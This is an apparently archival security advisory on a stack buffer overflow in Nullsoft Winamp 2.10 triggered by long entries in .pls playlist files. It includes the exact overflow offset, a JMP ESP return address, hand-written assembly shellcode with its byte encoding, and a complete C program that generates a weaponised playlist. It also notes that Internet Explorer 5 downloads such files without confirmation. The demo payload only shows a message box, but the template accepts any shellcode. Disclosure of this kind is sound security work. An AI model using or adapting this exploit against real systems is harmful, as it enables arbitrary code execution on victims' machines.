COMMAND

    Winamp

SYSTEMS AFFECTED

    Nullsoft Winamp 2.10

PROBLEM

    Steve Fewer found following.  He recently uncovered a stack  based
    buffer  overflow  in  winamp  version  2.10  which lets me execute
    'arbitrary code'.   It is  carried out  through .pls  files  which
    winamp uses for playlists.  This is unnerving as it is a  feasible
    plan to trade playlists on  irc during a mp3 trading  session with
    someone.

    The overflow occurs when an  entry greater than 580 bytes  is read
    in from a .pls file. The  EIP is the only register overwritten  in
    the next four bytes that follow,  from there on is space for  your
    shell code. eg.

        [playlist]
        File1=<580 bytes><eip><shell code>
        NumberOfEntries=1

    The first 580 bytes get mangled around in memory but the 585  byte
    (where our shell code starts) is pointed to by the ESP,  therefore
    a simple  'JMP ESP'  or the  like will  land us  back in our shell
    code. Steve used a 'JMP ESP' at address 0xBFB9CFF7 in comctl32.dll
    which winamp loads.  Pointing our EIP  into that address  lands us
    back where we want to be.

    This  was  all  created/tested  on  Windows 98 [Version 4.10.1998]
    running on an Intel PII400 with 128MB RAM.

    What  about  shell  code?   The  shell  code  Steve wrote for this
    simply displays  a message  box and  then calls  exit().   However
    Winamp doesn't load msvcrt.dll which  is needed to call exit()  so
    we have to load it  ourselves.  Steve used the  address 0xBFF776D4
    in  kernel32.dll  (v4.10.1998)  for  LoadLibraryA().   For calling
    Messagebox  he   used  the   address  0xBFF5412E   in   user32.dll
    (v4.10.1998) and for calling exit() he used the address 0x78005504
    in   msvcrt.dll   (v6.00.8397.0).    It   didn't   warrant   using
    GetProcAddress for  compatibilities sake.   For the  OP codes  see
    the exploit further on.

       // This loads msvcrt.dll
       push ebp
       mov ebp,esp
       xor eax,eax
       push eax
       push eax
       push eax
       mov byte ptr[ebp-0Ch],4Dh
       mov byte ptr[ebp-0Bh],53h
       mov byte ptr[ebp-0Ah],56h
       mov byte ptr[ebp-09h],43h
       mov byte ptr[ebp-08h],52h
       mov byte ptr[ebp-07h],54h
       mov byte ptr[ebp-06h],2Eh
       mov byte ptr[ebp-05h],44h
       mov byte ptr[ebp-04h],4Ch
       mov byte ptr[ebp-03h],4Ch
       mov edx,0xBFF776D4
       push edx
       lea eax,[ebp-0Ch]
       push eax
       call dword ptr[ebp-10h]
       // This calls MessageBox to say 'Hi!'
       push ebp
       mov ebp,esp
       xor edi,edi
       push edi
       mov byte ptr[ebp-04h],48h
       mov byte ptr[ebp-03h],69h
       mov byte ptr[ebp-02h],21h
       mov edx, 0xBFF5412E
       push edx
       push edi
       lea edx,[ebp-04h]
       push edx
       push edx
       push edi
       call dword ptr[ebp-08h]
       // This calls exit()
       push ebp
       mov ebp,esp
       mov edx,0xFFFFFFFF
       sub edx,0x87FFAAFB
       push edx
       xor eax,eax
       push eax
       call dword ptr[ebp-04h]

    The exploit:

    /* Stack based buffer overflow exploit for Winamp v2.10
     * Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
     *
     * For a detailed description on the exploit see my advisory.
     *
     * Tested with Winamp v2.10 using Windows98 on an Intel
     * PII 400 with 128MB RAM
     *
     * http://indigo.ie/~lmf
     */

    #include <stdio.h>

    int main()
    {

        printf("\n\n\t\t.......................................\n");
        printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
        printf("\t\t.......................................\n");
        printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
        printf("\t\t.........http://indigo.ie/~lmf.........\n");
        printf("\t\t.......................................\n\n");

    char buffer[640];
    char eip[8] = "\xF7\xCF\xB9\xBF";
    char sploit[256] =
    "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53
    \xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6
    \x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\x45\xF4\x50
    \xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21
    \xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF
    \xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";

    FILE *file;

        for(int x=0;x<580;x++)
        {
        buffer[x] = 0x90;
        }

    file = fopen("crAsh.pls","wb");

    fprintf(file, "[playlist]\n");
    fprintf(file, "File1=");
    fprintf(file, "%s", buffer);
    fprintf(file, "%s", eip);
    fprintf(file, "%s", sploit);
    fprintf(file, "\nNumberOfEntries=1");

    fclose(file);
    printf("\t     created file crAsh.pls loaded with the exploit.\n");
    return 0;
    }

    Vladimir Dubrovin added.  If WinAMP installed IE 5 downloads .pls
    file without user confirmation.

SOLUTION

    Vladimir Dubrovin found WinAMP 2.5E isn't vulnerable.